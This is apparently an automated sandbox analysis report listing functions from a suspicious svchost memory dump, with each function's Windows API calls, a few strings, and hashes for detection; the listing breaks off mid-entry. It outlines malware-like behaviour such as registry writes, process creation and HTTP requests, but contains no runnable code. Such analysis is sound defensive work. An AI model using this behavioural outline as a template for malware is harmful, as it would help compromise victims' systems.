Function 02EC4794 Relevance: 15.1, APIs: 10, Instructions: 143filesleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02EC4830
CreateEventW.KERNEL32(02EC62B8,00000000,00000000,?), ref: 02EC4852
CreateFileMappingW.KERNEL32(000000FF,02EC62B8,00000004,00000000,00000000,?), ref: 02EC4886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02EC489D
SetEvent.KERNEL32(00000000), ref: 02EC48D9
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 02EC48EC
UnmapViewOfFile.KERNEL32(00000000), ref: 02EC48F3
CloseHandle.KERNEL32(?), ref: 02EC4903
CloseHandle.KERNEL32(?), ref: 02EC4910
CloseHandle.KERNEL32(00000000), ref: 02EC4917

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: 601c54de18a9dd41c6bf0586583f6631f297fa95f3080b79dcdcc39eb6bb3505
Instruction ID: 357419c388eb50179240c6c6bc21db7319ab73bd12416984cbfaa5e2feecc5bd
Opcode Fuzzy Hash: 601c54de18a9dd41c6bf0586583f6631f297fa95f3080b79dcdcc39eb6bb3505
Instruction Fuzzy Hash: 3B4126325883929FD3219E918945BA7BBACFF85760F20482DF589C61C1DB30C446CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02EC1CD5 Relevance: 12.1, APIs: 8, Instructions: 115memorysleepstringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02EC1CFD
RtlAllocateHeap.NTDLL(00000000), ref: 02EC1D04

Part of subcall function 02EC1F07: wsprintfA.USER32 ref: 02EC1F49

lstrcpy.KERNEL32(00000000,00000000), ref: 02EC1D2D
GetProcessHeap.KERNEL32(00000000,?), ref: 02EC1DF6
HeapFree.KERNEL32(00000000), ref: 02EC1DFD
Sleep.KERNEL32(00001388), ref: 02EC1E08
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC1E1A
HeapFree.KERNEL32(00000000), ref: 02EC1E21

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: d3e94e8bb27fa111f9294e8e1fb2e2e4b7bb504fda38c74e696d9aa14e17e7a8
Instruction ID: 3ec7c0171edc217a7d2a17962e81ce04d3472cd34539b2ce9ff163ceca90a43e
Opcode Fuzzy Hash: d3e94e8bb27fa111f9294e8e1fb2e2e4b7bb504fda38c74e696d9aa14e17e7a8
Instruction Fuzzy Hash: 8341D0B18843009FC7208FA5D944B1BBBE8FF88319F20992EF199C6241D770C516CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02EC1E38 Relevance: 12.1, APIs: 8, Instructions: 81memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,02EC1148,00000009,00000000,02EC71E0,00000007), ref: 02EC1E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,02EC1148,00000009,00000000,02EC71E0,00000007), ref: 02EC1E67
RtlAllocateHeap.NTDLL(00000000), ref: 02EC1E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 02EC1E97
CreateThread.KERNEL32(00000000,00000000,02EC1F56,00000000,00000000,00000000), ref: 02EC1EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,02EC1148,00000009,00000000,02EC71E0,00000007), ref: 02EC1EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,02EC1148,00000009,00000000,02EC71E0,00000007), ref: 02EC1EF3
HeapFree.KERNEL32(00000000,?,?,?,?,02EC1148,00000009,00000000,02EC71E0,00000007), ref: 02EC1EFA

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: e1aa292f8693f10ad3e6a2750a78ecd207a039ce76ea1cd5cc998eaa1c21ef4d
Instruction ID: 72aa77e97361994a3cee400d7e65565a7e4ec8cb2e731b9247c0085c03582eb5
Opcode Fuzzy Hash: e1aa292f8693f10ad3e6a2750a78ecd207a039ce76ea1cd5cc998eaa1c21ef4d
Instruction Fuzzy Hash: 2321D370980746AFD7118FB6CD88A67BBACFF05258B60C92CF859CA205D770E816CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EC598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 02EC59D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 02EC59E8
RtlAllocateHeap.NTDLL(00000000), ref: 02EC59EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 02EC5A09
GetProcessHeap.KERNEL32(00000000,?), ref: 02EC5A1E
HeapFree.KERNEL32(00000000), ref: 02EC5A25
RegCloseKey.ADVAPI32(00000000), ref: 02EC5A2C

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: 27f2d5419a26b0ab445835ea0bb33b931e7b4cef17686e10a63fb809351193f7
Instruction ID: 4a5aa88b88af99672e154d74172cf2a2008606adbb2321ceb346d8abd1d52556
Opcode Fuzzy Hash: 27f2d5419a26b0ab445835ea0bb33b931e7b4cef17686e10a63fb809351193f7
Instruction Fuzzy Hash: B3310831280301AFEB209FA18C45B7BB7ACEF49629F64882CF995D7240D770E8038B61

Uniqueness

Uniqueness Score: -1.00%

Function 02EC15D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02EC15E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 02EC15FA
RtlAllocateHeap.NTDLL(00000000), ref: 02EC1601

Part of subcall function 02EC56E6: GetTempPathA.KERNEL32(00000104,?), ref: 02EC56F7

Part of subcall function 02EC2E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02EC2E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC1669
HeapFree.KERNEL32(00000000), ref: 02EC1670
GetProcessHeap.KERNEL32(00000000,?), ref: 02EC1683
HeapFree.KERNEL32(00000000), ref: 02EC168A

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: 7755a41bbd43634c39c2906aae0840c61fb81e125136426fa7df24bb315027c6
Instruction ID: 92c1458b68cd697623ab585f98e7f858c91aa3d8b83cf2240fb0661c17117c34
Opcode Fuzzy Hash: 7755a41bbd43634c39c2906aae0840c61fb81e125136426fa7df24bb315027c6
Instruction Fuzzy Hash: 1F1102728C0200BBE7006FE19D08F7AB76CEB49715F28982DFA4A89141CB3494538F71

Uniqueness

Uniqueness Score: -1.00%

Function 02EC4E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,00000000,?,?,02EC49A2,00000000,00000000,?,00000000,00000000,02EC70E8), ref: 02EC4E70
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02EC4E77
CreateThread.KERNEL32(00000000,00000000,02EC4F6B,00000000,00000000,00000000), ref: 02EC4EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,02EC70E8), ref: 02EC4EB6
HeapFree.KERNEL32(00000000,?,00000000,00000000,02EC70E8), ref: 02EC4EBD
CloseHandle.KERNEL32(00000000,00000000,?,?,02EC49A2,00000000,00000000,?,00000000,00000000,02EC70E8), ref: 02EC4ECD
CloseHandle.KERNEL32(00000000,?,00000000,00000000,02EC70E8), ref: 02EC4EDF

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: a41d4a08ab34b2670402f1b07fede0f2d85dd860281e2f5faa1426dec2b838c7
Instruction ID: 8012e8aee50b93c9a0ac07c42cde95b59b672dbc8947df250f4badd7253142f4
Opcode Fuzzy Hash: a41d4a08ab34b2670402f1b07fede0f2d85dd860281e2f5faa1426dec2b838c7
Instruction Fuzzy Hash: 69112571EC43216FD3204EF55D1CF6BAA5DAF49A15F26992CF941DE2C8C72088038AB0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC58A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02EC2EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02EC2D76,?,?,?,?), ref: 02EC2ED5

memset.MSVCRT ref: 02EC58E2
lstrcpyW.KERNEL32(?,02EC63B4), ref: 02EC590D
lstrcatW.KERNEL32(?,02EC764C), ref: 02EC591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02EC593B
ExitProcess.KERNEL32 ref: 02EC5946

Strings

D, xrefs: 02EC58EA

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 14df9faaa8a21fe3b5cb9d96c7b1dab559901cfc883de51305b80b28f85abdc0
Instruction ID: e20e5186ea3f0ac51a3e308d607012ec400feba36706703ab7654bd641e87c71
Opcode Fuzzy Hash: 14df9faaa8a21fe3b5cb9d96c7b1dab559901cfc883de51305b80b28f85abdc0
Instruction Fuzzy Hash: 1711C2B2880208AFDB10DBE5DD09FEB777CEF84715F608465FA09E6100E7349A668F64

Uniqueness

Uniqueness Score: -1.00%

Function 02EC3BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02EC3BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 02EC3C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 02EC3CB5
HeapFree.KERNEL32(00000000), ref: 02EC3CEB
HeapFree.KERNEL32(00000000), ref: 02EC3D00

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: b5dc973bd2e8fece6de468b8078407085e31c441b648e224cb720f1d4ef8a1b5
Instruction ID: 2cf5093b545d8df826b7b68371400a27faa13dd7b9a033a03c9c34938c404c8b
Opcode Fuzzy Hash: b5dc973bd2e8fece6de468b8078407085e31c441b648e224cb720f1d4ef8a1b5
Instruction Fuzzy Hash: 8431E5316882156FE7209AE1CE45FFFBB9CEB45B49F20C86CB955D2040E720D892CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 02EC5A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 02EC5ACA
RtlAllocateHeap.NTDLL(00000000), ref: 02EC5AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 02EC5B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC5B2F
HeapFree.KERNEL32(00000000), ref: 02EC5B36
RegCloseKey.ADVAPI32(?), ref: 02EC5B3D

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: 3bce894a19e57858d11e12e87bc4232ac4031de70c59ebd9a9671475ab0e0fe5
Instruction ID: 5140bd192a18b11bc62dd3fe4667b10a63a6f846d41871b85a0c10e85aadbdfc
Opcode Fuzzy Hash: 3bce894a19e57858d11e12e87bc4232ac4031de70c59ebd9a9671475ab0e0fe5
Instruction Fuzzy Hash: E1216B726C43105BC7304EF59E54B37BB5CDF89914FA0952DF691AB240DAB0F8078BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC2482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 02EC24B4
lstrlen.KERNEL32(00000000), ref: 02EC24D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC2524
HeapFree.KERNEL32(00000000), ref: 02EC252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC254C
HeapFree.KERNEL32(00000000), ref: 02EC2553

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: 7e40cc7facad803a7641f3233eef6011b9140f315df24937364f8288628e171c
Instruction ID: dc416ac6555d95c12ca9b9e46654cd2657a5a4c99f770d293d4bf22f87d2937c
Opcode Fuzzy Hash: 7e40cc7facad803a7641f3233eef6011b9140f315df24937364f8288628e171c
Instruction Fuzzy Hash: 4A210171C81209EBDB11DFE1DA097EEBAB9BF04329F309459EA00B1180D7744A56CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02EC38A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 02EC38B8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 02EC38D6
RtlAllocateHeap.NTDLL(00000000), ref: 02EC38DD
_vsnprintf.MSVCRT ref: 02EC38F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC390C
HeapFree.KERNEL32(00000000), ref: 02EC3913

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: f013918c7ebccedf49d75a6174a0d02a43bd05c51fa366ad5d5b7fd099c1bd45
Instruction ID: 0402f5f87e6b18029583ef517f7720e68a9ac5ef9e3e7a4b33bf7e8d87fe80eb
Opcode Fuzzy Hash: f013918c7ebccedf49d75a6174a0d02a43bd05c51fa366ad5d5b7fd099c1bd45
Instruction Fuzzy Hash: 2001DF725C02097BDB109AE5CC05FBB776CEB44760F60C869FE16D6240E630E9138B70

Uniqueness

Uniqueness Score: -1.00%

Function 02EC4423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02EC30CE,00000000,?,02EC30CE,?), ref: 02EC4433
GetProcessHeap.KERNEL32(00000008), ref: 02EC4447
RtlAllocateHeap.NTDLL(00000000), ref: 02EC444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 02EC4465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC4471
HeapFree.KERNEL32(00000000), ref: 02EC4478

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: 82e7f38467ed8e936716be5c91a1488fcd83f5214130bced1c79681d94508ad1
Instruction ID: f000c96f883f5bc087af6b6f399228bf0259899938bfe57ef65d1f605c84c288
Opcode Fuzzy Hash: 82e7f38467ed8e936716be5c91a1488fcd83f5214130bced1c79681d94508ad1
Instruction Fuzzy Hash: 28F04F71985212ABD7210BA7AC1CE6BBF6CFFC5B2AB21992CF445D2144D7308457CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC16FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02EC17FB,00000001), ref: 02EC1708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 02EC1722
RtlAllocateHeap.NTDLL(00000000), ref: 02EC1729
ExpandEnvironmentStringsA.KERNEL32(02EC138F,00000000,-00000040), ref: 02EC173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02EC1747
HeapFree.KERNEL32(00000000), ref: 02EC174E

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: 6b77a5d333da1290f57354a18c45b8f854fdab852ec16fc94b21703e2a7a09ee
Instruction ID: 41efb6f8ce53b77052ebc8044641a6b5875c1205e0b120cdeaacd9f289e45f36
Opcode Fuzzy Hash: 6b77a5d333da1290f57354a18c45b8f854fdab852ec16fc94b21703e2a7a09ee
Instruction Fuzzy Hash: ECF0B471AC021167D7211BF6AD0CF8B7AADABCA655F714838F949DA244D730C8578B70

Uniqueness

Uniqueness Score: -1.00%

Function 02EC3332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,02EC60A0), ref: 02EC333C
QueryPerformanceCounter.KERNEL32(?), ref: 02EC334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 02EC3372
GetTickCount.KERNEL32 ref: 02EC337A

Strings

&%c=%u, xrefs: 02EC3332

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: b428710f959feb54878e0bdb47581d7d8c10fc805e4106bf8204c2496ba3c475
Instruction ID: c4f3642ef2562ce4eff35bbfe97f0fbfeaaabfd581b848f3e1f8beb19aead71f
Opcode Fuzzy Hash: b428710f959feb54878e0bdb47581d7d8c10fc805e4106bf8204c2496ba3c475
Instruction Fuzzy Hash: 86F06231E80108ABDF10DFD9CA05AADBBBDFB45304F608894F514E2150DB30A6528F10

Uniqueness

Uniqueness Score: -1.00%

Function 02EC175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 02EC1784

Part of subcall function 02EC16FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02EC17FB,00000001), ref: 02EC1708

GetProcessHeap.KERNEL32(00000000,?), ref: 02EC180F
HeapFree.KERNEL32(00000000), ref: 02EC1816

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: 1b48d7ce716a8b63d7425d666a00eb23fb3d8dae6818532bb83461bc04d66de4
Instruction ID: f6682770f96de5c68ce296878d2f9f00ead95174247b9d61304cba9f12102c2e
Opcode Fuzzy Hash: 1b48d7ce716a8b63d7425d666a00eb23fb3d8dae6818532bb83461bc04d66de4
Instruction Fuzzy Hash: 2331E27258C3029FEB15AEE59A04B6A77ECAF46254F30943DF489CA146EB30C443CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02EC5348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02EC5367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02EC50BA,00000000), ref: 02EC537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,02EC50BA,00000000), ref: 02EC538C
RtlAllocateHeap.NTDLL(00000000), ref: 02EC5393
lstrcpy.KERNEL32(00000000,?), ref: 02EC53A3

Part of subcall function 02EC4543: StrStrIA.SHLWAPI(?,?,?,?,02EC712C,02EC62E4,02EC7224,?), ref: 02EC4563

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: 221f60faaa9c864221fc9e4e0ff8c3ca3f08750a1a57c12e4bf094f2ba192f40
Instruction ID: 2b80a660e8a6e259eff8d2bb421d7c4c593e5e38d3a08e1670aae611c9265045
Opcode Fuzzy Hash: 221f60faaa9c864221fc9e4e0ff8c3ca3f08750a1a57c12e4bf094f2ba192f40
Instruction Fuzzy Hash: 1D118EB29C411D6AEB01EAD1CD05CFFB3ACEB04200B74942AF911E6104DA709A078F64

Uniqueness

Uniqueness Score: -1.00%

Function 02EC3763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,02EC36F0,02EC1134,?), ref: 02EC378E
RtlAllocateHeap.NTDLL(00000000,?,02EC36F0), ref: 02EC3795
_vsnprintf.MSVCRT ref: 02EC37AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,02EC36F0,02EC1134,?), ref: 02EC37EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,02EC36F0,02EC1134,?), ref: 02EC37F3

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: 316ae04ec2bc857e34990178dc0e8c56d75248debc21cb07068de63a9024c977
Instruction ID: f877992fdcfde198b6b92bbf31806f0e551a8322dedba15f0a2e5d2d58703bbc
Opcode Fuzzy Hash: 316ae04ec2bc857e34990178dc0e8c56d75248debc21cb07068de63a9024c977
Instruction Fuzzy Hash: B301E5765C42027FD7015AE6ED05FA7BB6EEF843A4F70C878FA0481204EA3188238B61

Uniqueness

Uniqueness Score: -1.00%

Function 02EC4F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02EC4F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02EC4F84
CloseHandle.KERNEL32(00000000), ref: 02EC4F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 02EC4FB5
HeapFree.KERNEL32(00000000), ref: 02EC4FBC

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: bea50003d94f8325bf86ea4d024ef0a122db04dbec16ba38a41715d711245bc9
Instruction ID: 99a2215478e389ea56b7bba1b556c5cc607d28af08f66d129d9cc650d6955f90
Opcode Fuzzy Hash: bea50003d94f8325bf86ea4d024ef0a122db04dbec16ba38a41715d711245bc9
Instruction Fuzzy Hash: 78F0F0328C5128AFCB215FE1DD18A9EBA6CEF05329F609228F90495180C7304A638BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02EC21C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 02EC2225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 02EC225A
RtlAllocateHeap.NTDLL(00000000), ref: 02EC2261

Strings

f<v, xrefs: 02EC23B0

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: e80d50ab44afa13b392790db43846f7f12066c28b85d20eeb859743e2797e078
Instruction ID: b0e452745d83f0476cecca1126b07cae7b67588560800c942547cb1266a78562
Opcode Fuzzy Hash: e80d50ab44afa13b392790db43846f7f12066c28b85d20eeb859743e2797e078
Instruction Fuzzy Hash: B981F7728883529BD315DFD4DD40AA7BBECEF85304F25982DFD8993240E7349546CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02EC315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 02EC32A2
RtlAllocateHeap.NTDLL(00000000), ref: 02EC32AF

Strings

POST, xrefs: 02EC31B9
GET, xrefs: 02EC31D0, 02EC31DC

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: 7b36883a4e26c3e828f8391f5fda54af4852151ba416f14cc76b63afedb30b71
Instruction ID: e159daf9cd9c50b12a3d710929d3addb82458bd1e2f39fb78a3944795e894755
Opcode Fuzzy Hash: 7b36883a4e26c3e828f8391f5fda54af4852151ba416f14cc76b63afedb30b71
Instruction Fuzzy Hash: 0A5180B5584306AFD7208FA9CD44F27BBECFB88608F648D2DB996C2244D734D8568F21

Uniqueness

Uniqueness Score: -1.00%

Function 02EC3923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 02EC392F
memset.MSVCRT ref: 02EC3983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 02EC39B3

Strings

D, xrefs: 02EC398B

Memory Dump Source

Source File: 00000011.00000002.3295937076.0000000002EC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2ec1000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: 5d6b7717b855a5c294a9f5590536dbafed5d9b2f6b819f3b7be09a52c78d829a
Instruction ID: 092c347df0a3ed65616fad17a9343671a805a60be6173ce294bd414c15e7f8c3
Opcode Fuzzy Hash: 5d6b7717b855a5c294a9f5590536dbafed5d9b2f6b819f3b7be09a52c78d829a
